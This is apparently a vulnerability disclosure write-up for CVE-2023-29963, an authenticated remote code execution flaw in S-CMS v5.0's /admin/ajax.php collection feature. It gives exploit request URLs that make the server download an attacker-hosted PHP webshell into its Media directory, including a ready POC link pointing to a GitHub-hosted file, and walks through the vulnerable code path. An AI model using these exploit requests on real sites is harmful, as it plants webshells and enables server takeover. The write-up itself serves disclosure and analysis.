Headline
CVE-2023-29963: debug/s-cms_rce.md at main · superjock1988/debug
S-CMS v5.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the component /admin/ajax.php.
1.First download the latest version of S-CMS Enterprise Construction System Version 5.0
2.Because the vulnerability is the background command execution requires logging in to the background administrator account. The loophole interface address is: http://10.10.10.8/admin/ajax.php?Type=collection&ACTION=All&pageurl=http://10.10.8:88/1.tXt&ID=1 Directly request test
3.After the request is successful, a randomly named PHP file will be generated in the Media directory. This file is our sentence Trojan. Let’s visit and execute the command
4.Let ’s analyze the cause of the vulnerability. The vulnerability position is under admin/ajax.php file, and re -request the vulnerability URL:http://10.10.10.8/admin/ajax.php?type=collection&action=all&pageurl=http://10.10.10.8:88/1.txt&id=1 使用PhpStorm 开启调试并在以下位置设置断点
5.First check the fields in the SL_COMENT table. If the data exists, continue to execute downward
6.Extract all the data in the SL_COMENT table, and then bring the lrl (http://10.10.8:88/1.txt) the URL (http://10.10.8:88/1.txt) we give
7.The result of extraction returned and assigned value, we see that the return value is analyzed by the http://10.10.10.8:88/2.php link in the return value
8.Then download and read the content of the 2.php file, follow the downpic function
9.The PHP suffix of 2.php will be used as a preserved file suffix. The file name is used with the current time with random 3 -digit number to combine new file names. The 2.php file content is written into the Media directory through the file_put_contents method
10.Through the above operations, the Trojan horse will be written into the system. We can execute the system arbitrarily by accessing the PHP file.
11.The following two points need to be used to use this vulnerability:
11.1.Create a text file that is a similar data format in the SL_Collection table. Because the system will request the data in the table and extract the URL link in SRC, which is 2.PHP
11.2. 2.php In a phrase Trojan, note that the file cannot be run in the PHP environment, because the request needs a return value, all I use Python to start a HTTP service
![image](https://user-images.githubusercontent.com/113097106/227728467-f34ce272-5cce-46eb-82cd-fca1ea25d9ec.png
12.Online POC uses links : http://10.10.10.8/admin/ajax.php?type=collection&action=all&pageurl=https://raw.githubusercontent.com/superjock1988/debug/main/1.txt&id=1 Just need to modify the local server IP addre